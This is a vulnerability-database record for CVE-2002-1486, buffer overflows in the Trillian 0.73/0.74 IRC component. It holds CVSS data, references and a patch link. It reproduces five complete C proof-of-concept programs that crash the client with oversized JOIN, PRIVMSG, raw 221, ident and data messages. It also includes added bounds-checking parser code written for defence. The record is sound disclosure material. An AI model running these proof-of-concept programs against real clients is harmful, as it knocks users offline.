CVE-2002-1486
CVSS7.5
Published: 2003-04-02 00:00:00
Revised: 2008-09-05 16:30:43

[Original] Multiple buffer overflows in the IRC component of Trillian 0.73 and 0.74 allow remote malicious IRC servers to cause a denial of service and possibly execute arbitrary code via (1) a large response from the server, (2) a JOIN with a long channel name, (3) a long "raw 221" message, (4) a PRIVMSG with a long nickname, or (5) a long response from an IDENT server.


[CNNVD] Trillian IRC Oversized Message Block Remote Buffer Overflow Vulnerability (CNNVD-200304-021)

        
        Cerulean Studios Trillian is a chat program that presents a single interface to several instant-messaging networks, including AIM, ICQ, Yahoo! Messenger, MSN Messenger and IRC.
        Trillian mishandles oversized data sent by an IRC server; a remote attacker can exploit this to mount a denial-of-service attack against Trillian.
        If Trillian receives a data block of more than 4095 bytes over IRC, it crashes, resulting in a denial of service.
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:cerulean_studios:trillian:0.725
cpe:/a:cerulean_studios:trillian:0.73
cpe:/a:cerulean_studios:trillian:0.74

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1486
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1486
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-021
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/5777
(VENDOR_ADVISORY)  BID  5777
http://archives.neohapsis.com/archives/bugtraq/2002-09/0258.html
(VENDOR_ADVISORY)  BUGTRAQ  20020920 Yet Another. Trillian 'JOIN' Overflow.
http://www.securityfocus.com/bid/5769
(VENDOR_ADVISORY)  BID  5769
http://www.securityfocus.com/bid/5765
(UNKNOWN)  BID  5765
http://www.iss.net/security_center/static/10163.php
(VENDOR_ADVISORY)  XF  trillian-irc-server-bo(10163)
http://www.iss.net/security_center/static/10151.php
(VENDOR_ADVISORY)  XF  trillian-raw221-bo(10151)
http://www.iss.net/security_center/static/10150.php
(UNKNOWN)  XF  trillian-irc-join-bo(10150)
http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0139.html
(UNKNOWN)  NTBUGTRAQ  20020914 Trillian .74 and below, ident flaw.
http://archives.neohapsis.com/archives/bugtraq/2002-09/0268.html
(UNKNOWN)  BUGTRAQ  20020922 *sigh* Trillian multiple DoS
http://archives.neohapsis.com/archives/bugtraq/2002-09/0266.html
(UNKNOWN)  BUGTRAQ  20020921 And Again. Trillian 'raw 221' Overflow.
http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0140.html
(UNKNOWN)  NTBUGTRAQ  20020919 Trillian .73 & .74 "PRIVMSG" Overflow.

- Vulnerability information

Trillian IRC Oversized Message Block Remote Buffer Overflow Vulnerability
High risk  Boundary condition error
2003-04-02 00:00:00 2005-10-20 00:00:00
Remote

        Cerulean Studios Trillian is a chat program that presents a single interface to several instant-messaging networks, including AIM, ICQ, Yahoo! Messenger, MSN Messenger and IRC.
        Trillian mishandles oversized data sent by an IRC server; a remote attacker can exploit this to mount a denial-of-service attack against Trillian.
        If Trillian receives a data block of more than 4095 bytes over IRC, it crashes, resulting in a denial of service.
        

- Advisories and patches

        Vendor patch:
        Cerulean Studios
        ----------------
        The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's homepage:
        Cerulean Studios Trillian 0.74:
        Cerulean Studios Patch trillian-v0.74-patch-b.exe

        http://www.ceruleanstudios.com/trillian-v0.74-patch-b.exe

- Vulnerability information (21804)

Trillian 0.6351/0.7x Identd Buffer Overflow Vulnerability (EDBID:21804)
windows remote
2002-09-18 Verified
0 Lance Fitz-Herbert
N/A
source: http://www.securityfocus.com/bid/5733/info

Trillian ships with an ident server to facilitate connections to IRC servers that require an ident response before allowing access. A buffer overflow condition exists in the Trillian ident server, which may potentially be exploited to cause a denial of service or execute arbitrary code.

When the ident server receives a malformed request that is 418 bytes or more in length, the client crashes and memory is corrupted. It may be possible for an attacker to exploit the resulting memory corruption to execute arbitrary instructions with the privileges of the ident server.
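The defect described above is the absence of a length check between the socket and a fixed-size buffer. As an added example, not Trillian's code and not part of this record, the following C code shows the shape of that check for an RFC 1413 ident responder: a request is rejected before it is copied anywhere if it exceeds a cap, the two port numbers are parsed and range-checked, and a rejected request is answered with an ERROR line rather than having its bytes echoed back. IDENT_MAX_REQ, the function names and the 418-byte constructed request in demo_oversized_request are assumptions for this example.

```c
/* Added example (not Trillian's code): a bounded RFC 1413 ident request parser.
 * IDENT_MAX_REQ is a constructed cap for this example; a valid request is only
 * "<server-port> , <client-port>" and never comes close to it. */
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define IDENT_MAX_REQ 64

enum ident_status { IDENT_OK = 0, IDENT_TOO_LONG, IDENT_BAD_SYNTAX, IDENT_BAD_PORT };

/* Parse one request line. The length is checked before the request touches the
 * fixed-size buffer, which is the check the flaw described above lacks. */
enum ident_status ident_parse(const char *req, size_t len, int *server_port, int *client_port)
{
    char buf[IDENT_MAX_REQ + 1];
    char *end, *start;
    long a, b;

    *server_port = *client_port = 0;
    while (len && (req[len - 1] == '\n' || req[len - 1] == '\r')) len--;
    if (len > IDENT_MAX_REQ) return IDENT_TOO_LONG;
    memcpy(buf, req, len);
    buf[len] = '\0';

    errno = 0;
    a = strtol(buf, &end, 10);
    if (end == buf || errno) return IDENT_BAD_SYNTAX;
    while (isspace((unsigned char)*end)) end++;
    if (*end++ != ',') return IDENT_BAD_SYNTAX;
    start = end;
    b = strtol(start, &end, 10);
    if (end == start || errno) return IDENT_BAD_SYNTAX;
    while (isspace((unsigned char)*end)) end++;
    if (*end != '\0') return IDENT_BAD_SYNTAX;
    if (a < 1 || a > 65535 || b < 1 || b > 65535) return IDENT_BAD_PORT;
    *server_port = (int)a;
    *client_port = (int)b;
    return IDENT_OK;
}

/* Build the RFC 1413 reply. Rejected requests get an ERROR line and never have
 * their own bytes echoed back. Returns the reply length, or -1 if out is too small. */
int ident_reply(const char *req, size_t len, const char *user, char *out, size_t cap)
{
    int s, c, n;
    switch (ident_parse(req, len, &s, &c)) {
    case IDENT_OK:       n = snprintf(out, cap, "%d , %d : USERID : OTHER : %s\r\n", s, c, user); break;
    case IDENT_BAD_PORT: n = snprintf(out, cap, "%d , %d : ERROR : INVALID-PORT\r\n", s, c); break;
    default:             n = snprintf(out, cap, "%d , %d : ERROR : UNKNOWN-ERROR\r\n", s, c); break;
    }
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

/* Constructed request shaped like the malformed one described above: 418 bytes of 'A'. */
enum ident_status demo_oversized_request(void)
{
    char big[418];
    int s, c;
    memset(big, 'A', sizeof big);
    return ident_parse(big, sizeof big, &s, &c);
}
```

The cap is deliberately tight: anything a legitimate IRC server sends fits in a few dozen bytes, so an overlong request carries no information worth parsing and is simply dropped.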

/* Trillian-Ident.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits the Trillian Ident Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5
   This Example Will Just DoS The Trillian Client.

*/

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char payload[500];
int main(int argc, char * argv[]) {
        int iret;
        struct hostent *host;
        SOCKET sockhandle;
        SOCKADDR_IN address;
        WSADATA wsdata;

        if (argc<2) {
                printf("\nTrillian Ident DoS\n");
                printf("----------------------\n");
                printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
                printf("Tested On Version .74 and .73\n\n");
                printf("Usage: trillian-ident <address>");
                return 0;
        }

        WSAStartup(MAKEWORD(1,1),&wsdata);
        printf("Making Socket Now...\n");
        sockhandle = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);

        if (sockhandle == SOCKET_ERROR) {
                printf("Error Creating Socket\n");
                WSACleanup();
                return 1;
        }

        printf("Socket Created\n");

        address.sin_family = AF_INET;
        address.sin_port = htons(113);
        address.sin_addr.s_addr = inet_addr(argv[1]);


        if (address.sin_addr.s_addr == INADDR_NONE) {
                host = NULL;
                printf("Trying To Resolve Host\n");
                host = gethostbyname(argv[1]);
                if (host == NULL) {
                        printf("Unknown Host: %s\n",argv[1]);
                        WSACleanup();
                        return 1;
                }
                memcpy(&address.sin_addr, host->h_addr_list[0],host->h_length);
        }



        printf("Connecting To Server...\n");
        iret = connect(sockhandle, (struct sockaddr *) &address,        sizeof(address));

        if (iret == SOCKET_ERROR) {
                printf("Couldnt Connect\n");
                WSACleanup();
                return 1;
        }

        printf("Connected to %s!\nSending Payload\n",argv[1]);
        /* payload is not NUL-terminated, so send its full size rather than strlen() */
        memset(payload,'A',sizeof(payload));
        send(sockhandle,payload,sizeof(payload),0);
        Sleep(100);
        WSACleanup();
        return 0;
}
		

- Vulnerability information (21810)

Trillian 0.73/0.74 IRC PRIVMSG Buffer Overflow Vulnerability (EDBID:21810)
windows remote
2002-09-19 Verified
0 Lance Fitz-Herbert
N/A
source: http://www.securityfocus.com/bid/5755/info

Trillian is an instant messaging client that supports a number of protocols (including IRC, ICQ, MSN). It is available for Microsoft Windows systems.

A buffer overflow has been discovered in Trillian version .73 and .74. When processing a PRIVMSG command with an overly large sender name, a buffer overflow will occur resulting in memory corruption and a denial of service.

Although not yet confirmed, because memory can be overwritten, it may be possible for arbitrary attacker-supplied code to be executed with the privileges of the client.

/* Trillian-Privmsg.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits the Trillian Privmsg Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5 Commandline Tools.

   This Example Will Just DoS The Trillian Client,
   not particularly useful, just proves the flaw exists.
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>

SOCKET s;

#define MSG1 ":server 001 target :target\n:"
#define MSG2 "!ident@address PRIVMSG target :You are the weakest link, Goodbye.\n"

int main() {

        SOCKET TempSock = SOCKET_ERROR;
        WSADATA WsaDat;
        SOCKADDR_IN Sockaddr;
        int nRet;
        char payload[300];

        printf("\nTrillian Privmsg Flaw\n");
        printf("----------------------\n");
        printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
        printf("Tested On Version .74 and .73\nListening On Port 6667 For Connections\n\n");

        if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
                printf("ERROR: WSA Initialization failed.");
                return 0;
        }


        /* Create Socket */
        s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s == INVALID_SOCKET) {
                printf("ERROR: Could Not Create Socket. Exiting\n");
                WSACleanup();
                return 0;
        }

        Sockaddr.sin_port = htons(6667);
        Sockaddr.sin_family = AF_INET;
        Sockaddr.sin_addr.s_addr  = INADDR_ANY;


        nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
        if (nRet == SOCKET_ERROR) {
                printf("ERROR Binding Socket");
                WSACleanup();
                return 0;
        }

        /* Make Socket Listen */
        if (listen(s, 10) == SOCKET_ERROR) {
                printf("ERROR: Couldnt Make Listening Socket\n");
                WSACleanup();
                return 0;
        }

        while (TempSock == SOCKET_ERROR) {
              TempSock = accept(s, NULL, NULL);
        }

        printf("Client Connected, Sending Payload\n");

        send(TempSock,MSG1,strlen(MSG1),0);
        /* payload is not NUL-terminated, so send its full size rather than strlen() */
        memset(payload,'A',sizeof(payload));
        send(TempSock,payload,sizeof(payload),0);
        send(TempSock,MSG2,strlen(MSG2),0);

        printf("Exiting\n");
        Sleep(100);  /* Win32 Sleep() in milliseconds; sleep() is not declared by the headers above */
        WSACleanup();
        return 0;
}
		

- Vulnerability information (21813)

Trillian 0.73/0.74 IRC JOIN Buffer Overflow Vulnerability (EDBID:21813)
windows dos
2002-09-20 Verified
0 Lance Fitz-Herbert
N/A
source: http://www.securityfocus.com/bid/5765/info

The Trillian IRC module does not sufficiently check bounds on JOIN commands. A malicious IRC server may potentially exploit this condition to cause a denial of service or execute arbitrary code with the privileges of the client.

This issue was reported for Trillian versions 0.73 and 0.74. Earlier versions may also be affected. 

/* Trillian-Join.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits the Trillian Join Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5 Commandline Tools.

   This Example Will Just DoS The Trillian Client,
   not particularly useful, just proves the flaw exists.

*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>

SOCKET s;

#define MSG1 ":server 001 target :target\n:target!ident@address JOIN :"

int main() {

        SOCKET TempSock = SOCKET_ERROR;
        WSADATA WsaDat;
        SOCKADDR_IN Sockaddr;
        int nRet;
        char payload[300];

        printf("\nTrillian Join Flaw\n");
        printf("----------------------\n");
        printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
        printf("Tested On Version .74 and .73\nListening On Port 6667 For Connections\n\n");

        if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
                printf("ERROR: WSA Initialization failed.");
                return 0;
        }


        /* Create Socket */
        s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s == INVALID_SOCKET) {
                printf("ERROR: Could Not Create Socket. Exiting\n");
                WSACleanup();
                return 0;
        }

        Sockaddr.sin_port = htons(6667);
        Sockaddr.sin_family = AF_INET;
        Sockaddr.sin_addr.s_addr  = INADDR_ANY;


        nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
        if (nRet == SOCKET_ERROR) {
                printf("ERROR Binding Socket");
                WSACleanup();
                return 0;
        }

        /* Make Socket Listen */
        if (listen(s, 10) == SOCKET_ERROR) {
                printf("ERROR: Couldnt Make Listening Socket\n");
                WSACleanup();
                return 0;
        }

        while (TempSock == SOCKET_ERROR) {
              TempSock = accept(s, NULL, NULL);
        }

        printf("Client Connected, Sending Payload\n");

        send(TempSock,MSG1,strlen(MSG1),0);
        /* payload is not NUL-terminated, so send its full size rather than strlen() */
        memset(payload,'A',sizeof(payload));
        send(TempSock,payload,sizeof(payload),0);
        send(TempSock,"\n",1,0);

        printf("Exiting\n");
        Sleep(100);  /* Win32 Sleep() in milliseconds; sleep() is not declared by the headers above */
        WSACleanup();
        return 0;
}
		

- Vulnerability information (21816)

Trillian 0.725/0.73/0.74 IRC User Mode Numeric Remote Buffer Overflow Vulnerability (EDBID:21816)
windows dos
2002-09-21 Verified
0 Lance Fitz-Herbert
N/A
source: http://www.securityfocus.com/bid/5769/info

Trillian is an instant messaging client that supports a number of protocols (including IRC, ICQ, MSN). It is available for Microsoft Windows systems. 

It has been reported that Trillian does not perform adequate bounds checking when receiving IRC raw user mode messages. When a Trillian client receives an instruction from a server for a raw user mode change containing 251 or more bytes of data, a buffer overflow occurs. This could result in denial of service, or the execution of arbitrary attacker supplied instructions.

/* Trillian-221.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits the Trillian "Raw 221" Flaw.
   Tested On Version .74 and .73
   Compiles with Borland 5.5 Commandline Tools.

   This Example Will Just DoS The Trillian Client,
   not particularly useful, just proves the flaw exists.

   Greets: AnAh, Hooves.
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>

SOCKET s;

#define MSG1 ":server 221 target "

int main() {

        SOCKET TempSock = SOCKET_ERROR;
        WSADATA WsaDat;
        SOCKADDR_IN Sockaddr;
        int nRet;
        char payload[257];

        printf("\nTrillian Raw 221 Flaw\n");
        printf("---------------------\n");
        printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
        printf("Tested On Version .74 and .73\nListening On Port 6667 For Connections\n\n");

        if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
                printf("ERROR: WSA Initialization failed.");
                return 0;
        }


        /* Create Socket */
        s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s == INVALID_SOCKET) {
                printf("ERROR: Could Not Create Socket. Exiting\n");
                WSACleanup();
                return 0;
        }

        Sockaddr.sin_port = htons(6667);
        Sockaddr.sin_family = AF_INET;
        Sockaddr.sin_addr.s_addr  = INADDR_ANY;


        nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
        if (nRet == SOCKET_ERROR) {
                printf("ERROR Binding Socket");
                WSACleanup();
                return 0;
        }

        /* Make Socket Listen */
        if (listen(s, 10) == SOCKET_ERROR) {
                printf("ERROR: Couldnt Make Listening Socket\n");
                WSACleanup();
                return 0;
        }

        while (TempSock == SOCKET_ERROR) {
              TempSock = accept(s, NULL, NULL);
        }

        printf("Client Connected, Sending Payload\n");

        send(TempSock,MSG1,strlen(MSG1),0);
        /* payload is not NUL-terminated, so send its full size rather than strlen() */
        memset(payload,'A',sizeof(payload));
        send(TempSock,payload,sizeof(payload),0);
        send(TempSock,"\n",1,0);

        printf("Exiting\n");
        Sleep(100);  /* Win32 Sleep() in milliseconds; sleep() is not declared by the headers above */
        WSACleanup();
        return 0;
}

- Vulnerability information (21823)

Trillian 0.74 IRC Oversized Data Block Buffer Overflow Vulnerability (EDBID:21823)
windows dos
2002-09-22 Verified
0 Lance Fitz-Herbert
N/A
source: http://www.securityfocus.com/bid/5777/info

A vulnerability has been reported for Trillian. Reportedly, Trillian is prone to a buffer overflow condition when it receives blocks of data that are larger than 4095 bytes. 

A malicious server may exploit this condition to cause a denial of service in the client. This may also potentially be exploited to execute arbitrary code, though this possibility has not been confirmed.

/* Trillian-Dos.c
   Author: Lance Fitz-Herbert
   Contact: IRC: Phrizer, DALnet - #KORP
            ICQ: 23549284

   Exploits Multiple Trillian DoS Flaws:
      Raws 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333,
352, 367
      Part Flaw
      Data length flaw.

   Tested On Version .74
   Compiles with Borland 5.5 Commandline Tools.

   These Examples Will Just DoS The Trillian Client,
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>

SOCKET s;

#define SERVER ":server "
#define PART ":nick!ident@address PART\n"

void usage(void);

int main(int argc, char *argv[]) {
        SOCKET TempSock = SOCKET_ERROR;
        WSADATA WsaDat;
        SOCKADDR_IN Sockaddr;
        int nRet;
        char payload[4096];

        if (argc < 2) {
                usage();
                return 1;
        }
        /* "raw" needs a numeric argument; otherwise the type must be "part" or "data" */
        if ((!strcmp(argv[1],"raw") && argc < 3) ||
            (strcmp(argv[1],"raw") && strcmp(argv[1],"part") && strcmp(argv[1],"data"))) {
                usage();
                return 1;
        }

        printf("Listening on port 6667 for connections....\n");
        if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
                printf("ERROR: WSA Initialization failed.");
                return 0;
        }

        /* Create Socket */
        s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s == INVALID_SOCKET) {
                printf("ERROR: Could Not Create Socket. Exiting\n");
                WSACleanup();
                return 0;
        }

        Sockaddr.sin_port = htons(6667);
        Sockaddr.sin_family = AF_INET;
        Sockaddr.sin_addr.s_addr  = INADDR_ANY;

        nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
        if (nRet == SOCKET_ERROR) {
                printf("ERROR Binding Socket");
                WSACleanup();
                return 0;
        }

        /* Make Socket Listen */
        if (listen(s, 10) == SOCKET_ERROR) {
                printf("ERROR: Couldnt Make Listening Socket\n");
                WSACleanup();
                return 0;
        }

        while (TempSock == SOCKET_ERROR) {
                TempSock = accept(s, NULL, NULL);
        }

        printf("Client Connected, Sending Payload\n");

        if (!strcmp(argv[1],"part")) {
                send(TempSock,PART,strlen(PART),0);
        }
        if (!strcmp(argv[1],"raw")) {
                send(TempSock,SERVER,strlen(SERVER),0);
                send(TempSock,argv[2],strlen(argv[2]),0);
                send(TempSock,"\n",1,0);
        }
        if (!strcmp(argv[1],"data")) {
                /* payload is not NUL-terminated, so send its full size rather than strlen() */
                memset(payload,'A',sizeof(payload));
                send(TempSock,payload,sizeof(payload),0);
        }
        printf("Exiting\n");
        Sleep(100);  /* Win32 Sleep() in milliseconds; sleep() is not declared by the headers above */
        WSACleanup();
        return 0;
}

void usage(void) {
        printf("\nTrillian Multiple DoS Flaws\n");
        printf("---------------------------\n");
        printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
        printf("Tested On Version .74\n\n");
        printf("Usage: Trillian-Dos <type> [num]\n");
        printf("Type: raw, part, data\n");
        printf("Num : 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333, 352, 367\n\n");
}

- Vulnerability information

10791
Trillian IRC Plugin Channel Name Format String
Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Unknown

- Vulnerability description

A remote overflow exists in Trillian. Trillian fails to validate IRC channel names, resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code, resulting in a loss of integrity.

- Timeline

2002-08-02 2002-08-01
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author

- Vulnerability information

Trillian IRC Oversized Data Block Buffer Overflow Vulnerability
Failure to Handle Exceptional Conditions 5777
Yes No
2002-09-22 12:00:00 2009-07-11 05:06:00
Discovery of this vulnerability credited to "Lance Fitz-Herbert" <fitzies@hotmail.com>.

- Affected program versions

Cerulean Studios Trillian 0.74

- Vulnerability discussion

A vulnerability has been reported for Trillian. Reportedly, Trillian is prone to a buffer overflow condition when it receives blocks of data that are larger than 4095 bytes.

A malicious server may exploit this condition to cause a denial of service in the client. This may also potentially be exploited to execute arbitrary code, though this possibility has not been confirmed.
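Every case in this record (the oversized data block here, and the long JOIN channel name, long raw 221 mode string and long PRIVMSG sender nick in the EDB entries above) reduces to the same defect: a server-supplied field is copied into a fixed buffer without its length being checked first. As an added example, not Trillian's code and not the PoC author's, here is a bounds-checked IRC line parser in C that rejects each of those shapes before any byte reaches a fixed-size buffer. The 512-byte line cap and 15-parameter cap are RFC 1459's; IRC_MAX_NICK, IRC_MAX_CMD, IRC_MAX_PARAM, the function names and the constructed inputs in demo_case are assumptions for this example, and the inputs are constructed to match the shapes described, not the PoCs' own bytes.

```c
/* Added example (not Trillian's code or the PoC author's): a bounds-checked IRC
 * line parser. The 512-byte line cap and 15-parameter cap are RFC 1459's; the
 * nick, command and parameter limits are constructed for this example. */
#include <stdio.h>
#include <string.h>

#define IRC_MAX_LINE   512  /* RFC 1459: at most 512 bytes including CRLF */
#define IRC_MAX_PARAMS 15   /* RFC 1459: at most 15 parameters */
#define IRC_MAX_NICK   64   /* constructed */
#define IRC_MAX_CMD    16   /* constructed */
#define IRC_MAX_PARAM  200  /* constructed; RFC 1459 channel names are at most 200 */

enum irc_result {
    IRC_OK = 0, IRC_ERR_LINE_TOO_LONG, IRC_ERR_MALFORMED, IRC_ERR_NICK_TOO_LONG,
    IRC_ERR_COMMAND_TOO_LONG, IRC_ERR_TOO_MANY_PARAMS, IRC_ERR_PARAM_TOO_LONG
};

struct irc_msg {
    char nick[IRC_MAX_NICK + 1];
    char command[IRC_MAX_CMD + 1];
    int nparams;
    const char *params[IRC_MAX_PARAMS];  /* pointers into line_copy */
    char line_copy[IRC_MAX_LINE + 1];
};

/* Copy src[0..len) into dst only if it fits together with its terminator. */
static int copy_bounded(char *dst, size_t cap, const char *src, size_t len)
{
    if (len >= cap) return 0;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 1;
}

enum irc_result irc_parse(const char *line, size_t len, struct irc_msg *out)
{
    char *p, *sp;
    memset(out, 0, sizeof *out);
    /* The total length is checked before any byte lands in a fixed-size buffer. */
    while (len && (line[len - 1] == '\n' || line[len - 1] == '\r')) len--;
    if (len == 0) return IRC_ERR_MALFORMED;
    if (len > IRC_MAX_LINE) return IRC_ERR_LINE_TOO_LONG;
    memcpy(out->line_copy, line, len);
    out->line_copy[len] = '\0';
    p = out->line_copy;
    /* Optional prefix ":nick!user@host": the sender field an overlong PRIVMSG nick lands in. */
    if (*p == ':') {
        char *bang;
        if ((sp = strchr(p, ' ')) == NULL) return IRC_ERR_MALFORMED;
        *sp = '\0';
        bang = strchr(p + 1, '!');
        if (!copy_bounded(out->nick, sizeof out->nick, p + 1, (size_t)((bang ? bang : sp) - (p + 1))))
            return IRC_ERR_NICK_TOO_LONG;
        p = sp + 1;
    }
    /* Command word or numeric reply such as 221. */
    sp = strchr(p, ' ');
    if (!copy_bounded(out->command, sizeof out->command, p, sp ? (size_t)(sp - p) : strlen(p)))
        return IRC_ERR_COMMAND_TOO_LONG;
    if (sp == NULL) return IRC_OK;
    p = sp + 1;
    /* Parameters: the JOIN channel name and the 221 mode string land here, each bounded. */
    while (*p) {
        if (out->nparams == IRC_MAX_PARAMS) return IRC_ERR_TOO_MANY_PARAMS;
        if (*p == ':') { p++; sp = NULL; }   /* trailing parameter, may contain spaces */
        else sp = strchr(p, ' ');
        if (sp) *sp = '\0';
        if (strlen(p) > IRC_MAX_PARAM) return IRC_ERR_PARAM_TOO_LONG;
        out->params[out->nparams++] = p;
        if (sp == NULL) break;
        p = sp + 1;
    }
    return IRC_OK;
}

/* Constructed lines shaped like the cases above (not the PoCs' own bytes):
 * 0 well-formed, 1 300-byte PRIVMSG sender nick, 2 300-byte JOIN channel name,
 * 3 257-byte raw 221 mode string, 4 4096-byte data block. */
enum irc_result demo_case(int which)
{
    static char buf[8192];
    struct irc_msg m;
    const char *head = "", *tail = "";
    size_t fill = 0, n;
    switch (which) {
    case 0: head = ":nick!ident@address PRIVMSG target :hello"; break;
    case 1: head = ":"; fill = 300; tail = "!ident@address PRIVMSG target :hi"; break;
    case 2: head = ":target!ident@address JOIN :"; fill = 300; break;
    case 3: head = ":server 221 target "; fill = 257; break;
    case 4: fill = 4096; break;
    default: return IRC_ERR_MALFORMED;
    }
    n = strlen(head); memcpy(buf, head, n);
    memset(buf + n, 'A', fill); n += fill;
    memcpy(buf + n, tail, strlen(tail)); n += strlen(tail);
    buf[n++] = '\n';
    return irc_parse(buf, n, &m);
}
```

Two design points are worth noting. Rejecting an overlong field outright, rather than truncating it, keeps a hostile server from steering which bytes survive; and because the protocol caps a line at 512 bytes, a client that enforces that cap at the socket never sees the 4095-byte condition this record describes at all.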

- Exploit

An exploit has been provided by "Lance Fitz-Herbert" <fitzies@hotmail.com>.

- Solution

Fixes available:

Cerulean Studios Trillian 0.74

- References